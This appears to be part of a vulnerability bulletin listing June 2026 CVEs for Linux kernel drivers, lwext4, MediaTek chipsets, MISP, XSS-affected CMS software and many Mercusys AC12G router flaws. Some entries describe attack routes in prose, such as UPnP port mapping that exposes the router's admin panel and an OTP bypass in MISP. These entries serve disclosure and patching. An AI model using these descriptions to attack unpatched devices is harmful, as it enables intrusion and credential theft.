| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: clear stale link mapping of ahvif->links_map When an arvif is initialized in non-AP STA mode but MLO connection preparation fails before the arvif is created (arvif->is_created remains false), the error path attempts to delete all links. However, link deletion only executes when arvif->is_created is true. As a result, ahvif retains a stale entry of arvif that is initialized but not created. When a new arvif is initialized with the same link id, this stale mapping triggers the following WARN_ON. WARNING: drivers/net/wireless/ath/ath12k/mac.c:4271 at ath12k_mac_op_change_vif_links+0x140/0x180 [ath12k], CPU#3: wpa_supplicant/275 Call trace: ath12k_mac_op_change_vif_links+0x140/0x180 [ath12k] (P) drv_change_vif_links+0xbc/0x1a4 [mac80211] ieee80211_vif_update_links+0x54c/0x6a0 [mac80211] ieee80211_vif_set_links+0x40/0x70 [mac80211] ieee80211_prep_connection+0x84/0x450 [mac80211] ieee80211_mgd_auth+0x200/0x480 [mac80211] ieee80211_auth+0x14/0x20 [mac80211] cfg80211_mlme_auth+0x90/0xf0 [cfg80211] nl80211_authenticate+0x32c/0x380 [cfg80211] genl_family_rcv_msg_doit+0xc8/0x134 Fix this issue by unassigning the link vif and clearing ahvif->links_map if arvif is only initialized but not created. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.5-01651-QCAHKSWPL_SILICONZ-1 | 2026-06-03 | not yet calculated | CVE-2026-46248 | https://git.kernel.org/stable/c/da289440f04c93048d82d293b180f1cacdfee2d9 https://git.kernel.org/stable/c/acd8319e834be6790e449701cb6df0f636801977 https://git.kernel.org/stable/c/2c1ba9c2adf0fda96eaaebd8799268a7506a8fc9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-af: Fix PF driver crash with kexec kernel booting During a kexec reboot the hardware is not power-cycled, so AF state from the old kernel can persist into the new kernel. When AF and PF drivers are built as modules, the PF driver may probe before AF reinitializes the hardware. The PF driver treats the RVUM block revision as an indication that AF initialization is complete. If this value is left uncleared at shutdown, PF may incorrectly assume AF is ready and access stale hardware state, leading to a crash. Clear the RVUM block revision during AF shutdown to avoid PF mis-detecting AF readiness after kexec. | 2026-06-03 | not yet calculated | CVE-2026-46249 | https://git.kernel.org/stable/c/b7605b9301abc18fbbf2b0e23fdd281fc768955d https://git.kernel.org/stable/c/9769a09afda20a006b528b9e723effcae45965b2 https://git.kernel.org/stable/c/57821d1436ba1c6a6973aa32d54166fdec35558c https://git.kernel.org/stable/c/8b5ed7c5417b7013d35b6f2507dab739013ba1a9 https://git.kernel.org/stable/c/7d56ba306e93d04696718963fb4cda2883ee7585 https://git.kernel.org/stable/c/9c3398e5b3a914b74276d44ab54c49123b89c61a https://git.kernel.org/stable/c/1370736836a18b5e0cd74bcc9cffe11d21f1fe79 https://git.kernel.org/stable/c/2d2d574309e3ae84ee794869a5da8b4c38753a94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: fix locking in regulator_resolve_supply() error path If late enabling of a supply regulator fails in regulator_resolve_supply(), the code currently triggers a lockdep warning: WARNING: drivers/regulator/core.c:2649 at _regulator_put+0x80/0xa0, CPU#6: kworker/u32:4/596 ... Call trace: _regulator_put+0x80/0xa0 (P) regulator_resolve_supply+0x7cc/0xbe0 regulator_register_resolve_supply+0x28/0xb8 as the regulator_list_mutex must be held when calling _regulator_put(). To solve this, simply switch to using regulator_put(). While at it, we should also make sure that no concurrent access happens to our rdev while we clear out the supply pointer. Add appropriate locking to ensure that. While the code in question will be removed altogether in a follow-up commit, I believe it is still beneficial to have this corrected before removal for future reference. | 2026-06-03 | not yet calculated | CVE-2026-46252 | https://git.kernel.org/stable/c/c66e0db0f37290b53c57994f998bb55590364fd0 https://git.kernel.org/stable/c/497330b203d2c59c5ff3fa4c34d14494d7203bc3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: AppArmor: Allow apparmor to handle unaligned dfa tables The dfa tables can originate from kernel or userspace and 8-byte alignment isn't always guaranteed and as such may trigger unaligned memory accesses on various architectures. Resulting in the following [ 73.901376] WARNING: CPU: 0 PID: 341 at security/apparmor/match.c:316 aa_dfa_unpack+0x6cc/0x720 [ 74.015867] Modules linked in: binfmt_misc evdev flash sg drm drm_panel_orientation_quirks backlight i2c_core configfs nfnetlink autofs4 ext4 crc16 mbcache jbd2 hid_generic usbhid sr_mod hid cdrom sd_mod ata_generic ohci_pci ehci_pci ehci_hcd ohci_hcd pata_ali libata sym53c8xx scsi_transport_spi tg3 scsi_mod usbcore libphy scsi_common mdio_bus usb_common [ 74.428977] CPU: 0 UID: 0 PID: 341 Comm: apparmor_parser Not tainted 6.18.0-rc6+ #9 NONE [ 74.536543] Call Trace: [ 74.568561] [<0000000000434c24>] dump_stack+0x8/0x18 [ 74.633757] [<0000000000476438>] __warn+0xd8/0x100 [ 74.696664] [<00000000004296d4>] warn_slowpath_fmt+0x34/0x74 [ 74.771006] [<00000000008db28c>] aa_dfa_unpack+0x6cc/0x720 [ 74.843062] [<00000000008e643c>] unpack_pdb+0xbc/0x7e0 [ 74.910545] [<00000000008e7740>] unpack_profile+0xbe0/0x1300 [ 74.984888] [<00000000008e82e0>] aa_unpack+0xe0/0x6a0 [ 75.051226] [<00000000008e3ec4>] aa_replace_profiles+0x64/0x1160 [ 75.130144] [<00000000008d4d90>] policy_update+0xf0/0x280 [ 75.201057] [<00000000008d4fc8>] profile_replace+0xa8/0x100 [ 75.274258] [<0000000000766bd0>] vfs_write+0x90/0x420 [ 75.340594] [<00000000007670cc>] ksys_write+0x4c/0xe0 [ 75.406932] [<0000000000767174>] sys_write+0x14/0x40 [ 75.472126] [<0000000000406174>] linux_sparc_syscall+0x34/0x44 [ 75.548802] ---[ end trace 0000000000000000 ]--- [ 75.609503] dfa blob stream 0xfff0000008926b96 not aligned. [ 75.682695] Kernel unaligned access at TPC[8db2a8] aa_dfa_unpack+0x6e8/0x720 Work around it by using the get_unaligned_xx() helpers. | 2026-06-03 | not yet calculated | CVE-2026-46254 | https://git.kernel.org/stable/c/ec737e7fdf2f0ba7b203d4ec72cc915978b10e7e https://git.kernel.org/stable/c/23f112bd6144e815153462e12d313ac3e7027168 https://git.kernel.org/stable/c/cded636008bde2b397a7cf63b8299d7c303aaf6a https://git.kernel.org/stable/c/64802f731214a51dfe3c6c27636b3ddafd003eb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: fsl-edma: don't explicitly disable clocks in .remove() The clocks in fsl_edma_engine::muxclk are allocated and enabled with devm_clk_get_enabled(), which automatically cleans these resources up, but these clocks are also manually disabled in fsl_edma_remove(). This causes warnings on driver removal for each clock: edma_module already disabled WARNING: CPU: 0 PID: 418 at drivers/clk/clk.c:1200 clk_core_disable+0x198/0x1c8 [...] Call trace: clk_core_disable+0x198/0x1c8 (P) clk_disable+0x34/0x58 fsl_edma_remove+0x74/0xe8 [fsl_edma] [...] ---[ end trace 0000000000000000 ]--- edma_module already unprepared WARNING: CPU: 0 PID: 418 at drivers/clk/clk.c:1059 clk_core_unprepare+0x1f8/0x220 [...] Call trace: clk_core_unprepare+0x1f8/0x220 (P) clk_unprepare+0x34/0x58 fsl_edma_remove+0x7c/0xe8 [fsl_edma] [...] ---[ end trace 0000000000000000 ]--- Fix these warnings by removing the unnecessary fsl_disable_clocks() call in fsl_edma_remove(). | 2026-06-03 | not yet calculated | CVE-2026-46255 | https://git.kernel.org/stable/c/533d495f15e4c88ad5246c7f90ae026702e28d75 https://git.kernel.org/stable/c/68feac21bd4de7ae4faba05704c404861d991fcf https://git.kernel.org/stable/c/bda244871179543dd3be7d093236cb33b2fb1765 https://git.kernel.org/stable/c/b84dba68c4823da452cec99a5d213571a65d06de https://git.kernel.org/stable/c/666c53e94c1d0bf0bdf14c49505ece9ddbe725bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFS/localio: prevent direct reclaim recursion into NFS via nfs_writepages LOCALIO is an NFS loopback mount optimization that avoids using the network for READ, WRITE and COMMIT if the NFS client and server are determined to be on the same system. But because LOCALIO is still fundamentally "just NFS loopback mount" it is susceptible to recursion deadlock via direct reclaim, e.g.: NFS LOCALIO down to XFS and then back into NFS via nfs_writepages. Fix LOCALIO's potential for direct reclaim deadlock by ensuring that all its page cache allocations are done from GFP_NOFS context. Thanks to Ben Coddington for pointing out commit ad22c7a043c2 ("xfs: prevent stack overflows from page cache allocation"). | 2026-06-03 | not yet calculated | CVE-2026-46256 | https://git.kernel.org/stable/c/ae26a4cf2baf0a44c538dc093504d1994b02dade https://git.kernel.org/stable/c/6a5de0c4fc0f217eea945d3d72c34ee30d72cbc9 https://git.kernel.org/stable/c/67435d2d8a33a75f9647724952cb1b18279d2e95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clocksource/drivers/timer-sp804: Fix an Oops when read_current_timer is called on ARM32 platforms where the SP804 is not registered as the sched_clock. On SP804, the delay timer shares the same clkevt instance with sched_clock. On some platforms, when sp804_clocksource_and_sched_clock_init is called with use_sched_clock not set to 1, sched_clkevt is not properly initialized. However, sp804_register_delay_timer is invoked unconditionally, and read_current_timer() subsequently calls sp804_read on an uninitialized sched_clkevt, leading to a kernel Oops when accessing sched_clkevt->value. Declare a dedicated clkevt instance exclusively for delay timer, instead of sharing the same clkevt with sched_clock. This ensures that read_current_timer continues to work correctly regardless of whether SP804 is selected as the sched_clock. | 2026-06-03 | not yet calculated | CVE-2026-46257 | https://git.kernel.org/stable/c/693b0b594b0f278bafa784984129c0c0f988e352 https://git.kernel.org/stable/c/694921a93f3e3621e067afc545cedf6fe3b234a9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: cdev: Avoid NULL dereference in linehandle_create() In linehandle_create(), there is a statement like this: retain_and_null_ptr(lh); Soon after, there is a debug printout that dereferences "lh", which will crash things. Avoid the crash by using handlereq.lines, which is the same value. | 2026-06-03 | not yet calculated | CVE-2026-46258 | https://git.kernel.org/stable/c/87b9d7a4cfbed5f42af440372026270af997c766 https://git.kernel.org/stable/c/6af6be278e3ba2ffb6af5b796c89dfb3f5d9063e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: wpcm-fiu: Fix potential NULL pointer dereference in wpcm_fiu_probe() platform_get_resource_byname() can return NULL, which would cause a crash when passed the pointer to resource_size(). Move the fiu->memory_size assignment after the error check for devm_ioremap_resource() to prevent the potential NULL pointer dereference. | 2026-06-03 | not yet calculated | CVE-2026-46261 | https://git.kernel.org/stable/c/9e5cb7e67fbdb8320d68d87db882a92b36f6a1d9 https://git.kernel.org/stable/c/2c538a0b3472e99c892c26f4940da38b7d87f632 https://git.kernel.org/stable/c/0f93a80eb3fd596ddc5730d05e0e8c88e1aa2891 https://git.kernel.org/stable/c/cb9b2dc34a9eef0855edb00ae9c9b7f72394281b https://git.kernel.org/stable/c/888a0a802c467bbe34a42167bdf9d7331333440a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: fsl_xcvr: Revert fix missing lock in fsl_xcvr_mode_put() This reverts commit f51424872760 ("ASoC: fsl_xcvr: fix missing lock in fsl_xcvr_mode_put()"). The original patch attempted to acquire the card->controls_rwsem lock in fsl_xcvr_mode_put(). However, this function is called from the upper ALSA core function snd_ctl_elem_write(), which already holds the write lock on controls_rwsem for the whole put operation. So there is no need to simply hold the lock for fsl_xcvr_activate_ctl() again. Acquiring the read lock while holding the write lock in the same thread results in a deadlock and a hung task, as reported by Alexander Stein. | 2026-06-03 | not yet calculated | CVE-2026-46262 | https://git.kernel.org/stable/c/ae5a70e3e87c28edbaf9939cfef1bcbd9615420f https://git.kernel.org/stable/c/30ffcad5edb56947dccc26f6816ab7a55b21a711 https://git.kernel.org/stable/c/29b2fbe3498da3681a01b34e4a2259f8a1b89448 https://git.kernel.org/stable/c/b0f74f5d24fe3c73ef1369a811891198b54c1e8e https://git.kernel.org/stable/c/9a2a5da002775376498e8814df4a87cd629a3a0c https://git.kernel.org/stable/c/0886dc6326c3cc596799c4340d342898301cf52a https://git.kernel.org/stable/c/9f16d96e1222391a6b996a1b676bec14fb91e3b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: hci: shdlc: Stop timers and work before freeing context llc_shdlc_deinit() purges SHDLC skb queues and frees the llc_shdlc structure while its timers and state machine work may still be active. Timer callbacks can schedule sm_work, and sm_work accesses SHDLC state and the skb queues. If teardown happens in parallel with a queued/running work item, it can lead to UAF and other shutdown races. Stop all SHDLC timers and cancel sm_work synchronously before purging the queues and freeing the context. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-06-03 | not yet calculated | CVE-2026-46267 | https://git.kernel.org/stable/c/c60f41022eaad2a1dafecd3ae6f249a3bd6d4b6e https://git.kernel.org/stable/c/a24a676329d40481b2331bfa1418a679577dfd3a https://git.kernel.org/stable/c/77eef9f2eef045c3c37a3df82d3e661afb866b98 https://git.kernel.org/stable/c/cf70cedce327833296ebe6043364d1e44b76a2ab https://git.kernel.org/stable/c/276820278e9717cc7d4bb32381892dd3ddf418d4 https://git.kernel.org/stable/c/1cb97b1225450af3f7b728777929ba50c6a58ced https://git.kernel.org/stable/c/c9efde1e537baed7648a94022b43836a348a074f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/P2PDMA: Fix p2pmem_alloc_mmap() warning condition Commit b7e282378773 has already changed the initial page refcount of p2pdma page from one to zero, however, in p2pmem_alloc_mmap() it uses "VM_WARN_ON_ONCE_PAGE(!page_ref_count(page))" to assert the initial page refcount should not be zero and the following will be reported when CONFIG_DEBUG_VM is enabled: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x380400000 flags: 0x20000000002000(reserved|node=0|zone=4) raw: 0020000000002000 ff1100015e3ab440 0000000000000000 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: VM_WARN_ON_ONCE_PAGE(!page_ref_count(page)) ------------[ cut here ]------------ WARNING: CPU: 5 PID: 449 at drivers/pci/p2pdma.c:240 p2pmem_alloc_mmap+0x83a/0xa60 Fix by using "page_ref_count(page)" as the assertion condition. | 2026-06-03 | not yet calculated | CVE-2026-46268 | https://git.kernel.org/stable/c/eb9aa9f8010465d927864f5a35bdc5604b0ff51a https://git.kernel.org/stable/c/9b69243983fb2f4d4d1f4ef0989bc1296547dc2c https://git.kernel.org/stable/c/cb500023a75246f60b79af9f7321d6e75330c5b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: canaan: k230: Fix NULL pointer dereference when parsing devicetree When probing the k230 pinctrl driver, the kernel triggers a NULL pointer dereference. The crash trace showed: [ 0.732084] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000068 [ 0.740737] ... [ 0.776296] epc : k230_pinctrl_probe+0x1be/0x4fc In k230_pinctrl_parse_functions(), we attempt to retrieve the device pointer via info->pctl_dev->dev, but info->pctl_dev is only initialized after k230_pinctrl_parse_dt() completes. At the time of DT parsing, info->pctl_dev is still NULL, leading to the invalid dereference of info->pctl_dev->dev. Use the already available device pointer from platform_device instead of accessing through uninitialized pctl_dev. | 2026-06-03 | not yet calculated | CVE-2026-46269 | https://git.kernel.org/stable/c/3c7d637bfc3dfbd6471c68bd767f7eb8b5b09eba https://git.kernel.org/stable/c/1d0d361f4dbc2bb2003594f84e4b101fc6b508c0 https://git.kernel.org/stable/c/d8c128fb6c2277d95f3f6a4ce28b82c8370031f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: coresight: tmc-etr: Fix race condition between sysfs and perf mode When trying to run perf and sysfs mode simultaneously, the WARN_ON() in tmc_etr_enable_hw() is triggered sometimes: WARNING: CPU: 42 PID: 3911571 at drivers/hwtracing/coresight/coresight-tmc-etr.c:1060 tmc_etr_enable_hw+0xc0/0xd8 [coresight_tmc] [..snip..] Call trace: tmc_etr_enable_hw+0xc0/0xd8 [coresight_tmc] (P) tmc_enable_etr_sink+0x11c/0x250 [coresight_tmc] (L) tmc_enable_etr_sink+0x11c/0x250 [coresight_tmc] coresight_enable_path+0x1c8/0x218 [coresight] coresight_enable_sysfs+0xa4/0x228 [coresight] enable_source_store+0x58/0xa8 [coresight] dev_attr_store+0x20/0x40 sysfs_kf_write+0x4c/0x68 kernfs_fop_write_iter+0x120/0x1b8 vfs_write+0x2c8/0x388 ksys_write+0x74/0x108 __arm64_sys_write+0x24/0x38 el0_svc_common.constprop.0+0x64/0x148 do_el0_svc+0x24/0x38 el0_svc+0x3c/0x130 el0t_64_sync_handler+0xc8/0xd0 el0t_64_sync+0x1ac/0x1b0 ---[ end trace 0000000000000000 ]--- Since the enablement of sysfs mode is separated into two critical regions, one for sysfs buffer allocation and another for hardware enablement, it is possible to race with the perf mode. Fix this by double-checking whether the perf mode is already in use before enabling the hardware in sysfs mode. mode: [sysfs mode] [perf mode] tmc_etr_get_sysfs_buffer() spin_lock(&drvdata->spinlock) [sysfs buffer allocation] spin_unlock(&drvdata->spinlock) spin_lock(&drvdata->spinlock) tmc_etr_enable_hw() drvdata->etr_buf = etr_perf->etr_buf spin_unlock(&drvdata->spinlock) spin_lock(&drvdata->spinlock) tmc_etr_enable_hw() WARN_ON(drvdata->etr_buf) // WARN since etr_buf was initialized on the perf side spin_unlock(&drvdata->spinlock) With this fix, we retain the check for CS_MODE_PERF in get_etr_sysfs_buf. This ensures we verify whether the perf mode is already running before we actually allocate the buffer. This also saves the time of allocating and freeing the sysfs buffer when racing with the perf mode. | 2026-06-03 | not yet calculated | CVE-2026-46272 | https://git.kernel.org/stable/c/38a07194bbcddb18d77dad40ba9978d994c0b74c https://git.kernel.org/stable/c/6906aa70d4fc5900b954136e20e27c2be6d1acab https://git.kernel.org/stable/c/e6e43e82c79c97917cbe356c07e8a6f3f982ab53 |
| lwext4--lwext4 | A divide-by-zero vulnerability in the ext4_block_set_lb_size function in src/ext4_blockdev.c of the lwext4 1.0.0 library allows attackers to cause a denial of service by providing a malformed ext4 filesystem image that results in a zero logical block size. The vulnerability is triggered during mount or image processing and leads to a Floating-Point Exception (FPE) under sanitizers or a runtime crash in standard builds due to missing validation of lb_size. | 2026-06-03 | not yet calculated | CVE-2025-70100 | https://github.com/gkostka/lwext4/issues/90 https://github.com/sigdevel/pocs/blob/main/res/lwext4/2/sig8_2_lwext4_ext4_blockdev_c_127 https://infosec.exchange/@sigdevel/116668952003072580 |
| lwext4--lwext4 | An out-of-bounds read in the ext4_ext_binsearch_idx function in src/ext4_extent.c of the lwext4 1.0.0 library allows attackers to cause a denial of service by supplying a specially crafted ext4 filesystem image. The vulnerability occurs due to insufficient validation of extent header fields before performing a binary search over extent index entries, which can result in invalid pointer calculations and an out-of-bounds memory read during extent tree traversal. | 2026-06-03 | not yet calculated | CVE-2025-70101 | https://github.com/gkostka/lwext4/issues/91 https://github.com/sigdevel/pocs/blob/main/res/lwext4/3/sig11_lwext4_ext4_extent_815 https://infosec.exchange/@sigdevel/116668958927817708 |
| lwext4--lwext4 | A NULL pointer dereference in the ext4_dir_en_get_name_len function in include/ext4_dir.h of lwext4 1.0.0 allows attackers to cause a denial of service by supplying a specially crafted EXT4 filesystem image with malformed directory entries. During directory iteration, the code may fail to validate the directory entry pointer before accessing the name_len field, resulting in a segmentation fault. This affects versions based on (or equivalent to) the 2016-era codebase (1.0.0). | 2026-06-01 | not yet calculated | CVE-2025-70099 | https://github.com/gkostka/lwext4/issues/89 https://github.com/sigdevel/pocs/blob/main/res/lwext4/1/sig11_2_1_lwext4_ext4_dir_h_126 https://infosec.exchange/@sigdevel/116668939725424227 |
| MaxSite--CMS v.109.2 | Cross Site Scripting vulnerability in MaxSite CMS v.109.2 allows a remote attacker to obtain sensitive information via the Backend page file upload endpoint used by admin_page | 2026-06-03 | not yet calculated | CVE-2026-37700 | http://maxsite.com https://github.com/PureStream108/CVE/blob/main/MaxSite109.2/about_en.md |
| MediaTek, Inc.--MediaTek chipset | In wlan AP driver, there is a possible memory corruption due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00480138; Issue ID: MSV-6295. | 2026-06-01 | not yet calculated | CVE-2026-20452 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10886526; Issue ID: MSV-6791. | 2026-06-01 | not yet calculated | CVE-2026-20453 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10873936; Issue ID: MSV-6786. | 2026-06-01 | not yet calculated | CVE-2026-20454 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In geniezone, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS10873936; Issue ID: MSV-6784. | 2026-06-01 | not yet calculated | CVE-2026-20455 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| MediaTek, Inc.--MediaTek chipset | In wlan STA driver, there is a possible system crash due to a missing bounds check. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00480851; Issue ID: MSV-6338. | 2026-06-01 | not yet calculated | CVE-2026-20456 | https://corp.mediatek.com/product-security-bulletin/June-2026 |
| Memos--Memos v.0.26.0 | Cross Site Scripting vulnerability in usememos Memos v.0.26.0 allows a remote attacker to obtain sensitive information via the SANITIZE_SCHEMA, Memo Rendering Component, and Public/Private Memo View pages | 2026-06-02 | not yet calculated | CVE-2026-30586 | https://github.com/usememos/memos/blob/e1c8101d29ccf382c07673934e1d9a311480c25a/web/src/components/MemoContent/constants.ts#L30 https://gist.github.com/gabdevele/1dd393955d3ca7d937776fdca9412f0c |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 exposes 15 of 18 UPnP IGD actions without authentication on port 1900, including AddPortMapping and GetExternalIPAddress. UPnP is enabled by default through the admin interface, allowing any unauthenticated LAN device to create arbitrary port forwarding rules and access WAN traffic statistics. | 2026-06-03 | not yet calculated | CVE-2026-36603 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36603.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 does not validate the HTTP Host header, enabling DNS rebinding attacks. An external attacker can rebind a domain to the router's internal IP address, extending the CORS wildcard vulnerability (Access-Control-Allow-Origin: *) to internet-originated attacks. | 2026-06-03 | not yet calculated | CVE-2026-36604 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36604.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 is vulnerable to a HTTP denial of service via a low number of crafted incomplete HTTP requests, causing a persistent crash that requires physical power cycling to recover. | 2026-06-03 | not yet calculated | CVE-2026-36605 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36605.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 encrypts configuration backups with a hardcoded DES key using single DES in ECB mode. An attacker who obtains a backup file can decrypt it to recover all stored credentials including admin password, WiFi PSK, and DDNS credentials. | 2026-06-03 | not yet calculated | CVE-2026-36606 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36606.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows unauthenticated brute-force attacks via the TDDP password change endpoint (code=10), which lacks the rate limiting applied to the login endpoint (code=7). An attacker on the adjacent network can attempt unlimited passwords without triggering account lockout. | 2026-06-03 | not yet calculated | CVE-2026-36607 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36607.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 allows UPnP AddPortMapping to forward external ports to the router's own admin interface by accepting its own IP (192.168.1.1) or localhost (127.0.0.1) as InternalClient. An unauthenticated LAN attacker can expose the admin panel to the internet with a single SOAP request. | 2026-06-03 | not yet calculated | CVE-2026-36608 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36608.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 uses a static authentication nonce that does not change between requests from the same source IP. Combined with the predictable XOR-based password encoding (securityEncode function), this allows an attacker to reverse captured authentication tokens to recover the plaintext password. | 2026-06-03 | not yet calculated | CVE-2026-36609 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36609.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 transmits DDNS credentials over plaintext HTTP with only Base64 encoding. The firmware contains no TLS implementation, allowing man-in-the-middle interception of DDNS service credentials. | 2026-06-03 | not yet calculated | CVE-2026-36610 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36610.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 returns 128 bytes of uninitialized buffer when receiving POST requests without SOAPAction header on UPnP port 1900, exposing internal memory to unauthenticated adjacent network attackers. | 2026-06-03 | not yet calculated | CVE-2026-36611 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36611.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 enables WPS 2.0 by default with a weak lockout policy (60-second lockout after 10 attempts). | 2026-06-03 | not yet calculated | CVE-2026-36612 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36612.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 returns 128 bytes of uninitialized internal buffer contents when receiving HTTP POST requests to undefined paths, exposing server state to unauthenticated adjacent network attackers. | 2026-06-03 | not yet calculated | CVE-2026-36613 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36613.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 exposes an undocumented /agileconfigreset endpoint that returns internal buffer contents to unauthenticated attackers on the adjacent network. | 2026-06-03 | not yet calculated | CVE-2026-36615 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36615.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 contains hardcoded WiFi driver credentials including a RADIUS shared secret, WPS test key, and default PSK embedded in the production firmware binary. | 2026-06-03 | not yet calculated | CVE-2026-36616 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36616.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 with firmware AC12G(EU)_V1_200909 responds to version.bind CHAOS TXT queries, disclosing the DNS resolver software version (unbound 1.22.0), aiding targeted attacks against known vulnerabilities. | 2026-06-03 | not yet calculated | CVE-2026-36618 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36618.md |
| Mercusys--AC12G | Mercusys AC12G (EU) V1 router with firmware AC12G(EU)_V1_200909 discloses kernel memory layout via the UPnP GetStatusInfo action. An unauthenticated attacker on the adjacent network can obtain a raw MIPS KSEG0 kernel pointer, revealing kernel memory layout and aiding further exploitation. | 2026-06-03 | not yet calculated | CVE-2026-36602 | https://github.com/Tymbark7372/MERCUSYS-AC12G/blob/master/advisories/CVE-2026-36602.md |
| misp--misp | An authentication bypass vulnerability exists in MISP when LDAP mixed authentication is enabled with OTP enforcement. In deployments configured with LdapAuth.mixedAuth=true and Security.require_otp=true, users authenticated through an authentication plugin, such as LDAP, may have their authenticated session established during the application beforeFilter phase before the normal login flow enforces the OTP challenge. As a result, an attacker with valid primary authentication credentials could bypass the required OTP step by authenticating through the plugin-backed login flow and then directly accessing another application URL instead of completing the OTP verification page. This allows access to the application as the affected user without providing a valid TOTP, HOTP, or email OTP code. The issue affects configurations where plugin-based authentication is enabled and OTP is expected to be mandatory. The fix ensures that OTP requirements are checked immediately after plugin authentication and before the user session is established, redirecting users to the appropriate OTP challenge when required. | 2026-06-02 | not yet calculated | CVE-2026-10611 | https://github.com/MISP/MISP/commit/39b3cb15aac4318afdd2ab63b96c2eac12b271fe |
| misp--misp | A visibility control issue in the event template creation workflow allowed non-site-admin users to access private galaxies belonging to other organisations. The event template builder loaded all enabled galaxies without applying organisation or distribution-based access restrictions, potentially exposing private galaxy metadata such as galaxy type and description to users who should not have visibility. The issue has been fixed by restricting galaxy queries for non-site-admin users to galaxies owned by the user's organisation or galaxies with a non-private distribution setting. Site administrators retain visibility of all enabled galaxies. | 2026-06-04 | not yet calculated | CVE-2026-10854 | https://github.com/MISP/MISP/commit/d3adfe1a097dd4b403364e9af34e208660eeec1a |
